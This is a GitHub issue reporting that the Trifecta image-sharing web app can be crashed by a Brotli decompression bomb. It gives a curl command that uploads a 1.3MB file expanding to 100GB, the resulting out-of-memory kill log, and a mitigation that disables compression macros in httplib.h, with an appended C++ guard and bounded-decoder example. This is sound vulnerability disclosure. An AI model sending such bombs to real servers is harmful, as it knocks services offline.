berthubert / trifecta

educational image sharing website built on a combination of modern C++, web and database technologies

Trifecta is vulnerable to Brotli ("zip") bombs if Brotli support is enabled

wandernauta opened this issue · comments

Trifecta allows zlib (gzip) and Brotli (br) compression/decompression of requests and responses when, at build time, it is detected that the libraries to do this are present on the system.

However, in this case, this feature makes Trifecta vulnerable to a "zip bomb" attack, where a crafted highly compressed file is uploaded, and the app is tricked into trying to uncompress it in memory.

Taking the file from here and bunzipping it, we have a 1.3MB Brotli file that uncompresses to 100GB of data. When we send this file, the app will attempt to allocate the entire 100GB worth of memory. My machine is not that large, so this triggers the OOM killer, which then (luckily) kills the Trifecta process.

To demonstrate:

% ~ › curl -H 'Content-Encoding: br' --data-binary @100GB.html.br http://127.0.0.1:8080/trifecta/status
<html>
<head><title>502 Bad Gateway</title></head>
<body>
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.25.3</center>
</body>
</html>
% ~/Code/trifecta › ./buildDir/trifecta
Database is in trifecta.sqlite, canonical URL is http://127.0.0.1:3456/
Admin users: admin 
Will listen on http://127.0.0.1:3456
zsh: killed     ./buildDir/trifecta
[ 2961.933094] Out of memory: Killed process 6865 (trifecta) total-vm:6445152kB, anon-rss:2927824kB, file-rss:1920kB, shmem-rss:0kB, UID:1000 pgtables:5848kB oom_score_adj:0

As a mitigation, trifecta should ensure that the following macros are never defined when httplib.h is included:

  • CPPHTTPLIB_ZLIB_SUPPORT
  • CPPHTTPLIB_BROTLI_SUPPORT

In the example above, the request goes through nginx, but the behavior is the same regardless of whether Trifecta is fronted by nginx or not.
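As an added illustration of the two defences this issue points at (not code from Trifecta or cpp-httplib): a build-time guard that refuses the two macros named above, plus a streaming decoder that enforces a hard cap on decompressed bytes so a tiny input declaring 100 GB is rejected before any memory is touched. The run-length format below is a constructed toy standing in for Brotli; `decode_rle_bounded` and `BoundedSink` are names chosen for this example.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Compile-time guard matching the mitigation in the issue: fail the build if
// httplib.h would be compiled with request/response decompression enabled.
#if defined(CPPHTTPLIB_ZLIB_SUPPORT) || defined(CPPHTTPLIB_BROTLI_SUPPORT)
#error "trifecta must not enable httplib decompression (decompression-bomb risk)"
#endif

// Streaming sink with a hard budget on *decompressed* bytes. A decoder feeds it
// chunk by chunk; once the budget would be exceeded it reports failure so the
// caller stops decoding instead of growing a buffer toward the OOM killer.
struct BoundedSink {
    std::string out;
    std::size_t budget;
    explicit BoundedSink(std::size_t max_bytes) : budget(max_bytes) {}
    bool accept(char c, std::size_t repeat) {
        if (repeat > budget - out.size()) return false;  // would exceed the cap
        out.append(repeat, c);
        return true;
    }
};

// Toy run-length format standing in for Brotli (constructed for this example):
// each record is "<decimal count><char>", so "3a2b" decodes to "aaabb". A
// 13-byte input such as "100000000000x" declares 100 GB of output, much like
// the 1.3 MB .br file in the report. Returns true and fills `out` on success;
// returns false (leaving at most max_bytes allocated) for a bomb, a truncated
// record, or a count that does not fit in 64 bits.
bool decode_rle_bounded(const std::string& in, std::size_t max_bytes, std::string& out) {
    BoundedSink sink(max_bytes);
    std::size_t i = 0;
    while (i < in.size()) {
        std::uint64_t count = 0;
        while (i < in.size() && in[i] >= '0' && in[i] <= '9') {
            if (count > (UINT64_MAX - 9) / 10) return false;  // count overflow
            count = count * 10 + static_cast<std::uint64_t>(in[i++] - '0');
        }
        if (i >= in.size()) return false;          // record missing its byte
        if (count > max_bytes) return false;       // reject before allocating
        if (!sink.accept(in[i++], static_cast<std::size_t>(count))) return false;
    }
    out.swap(sink.out);
    return true;
}
```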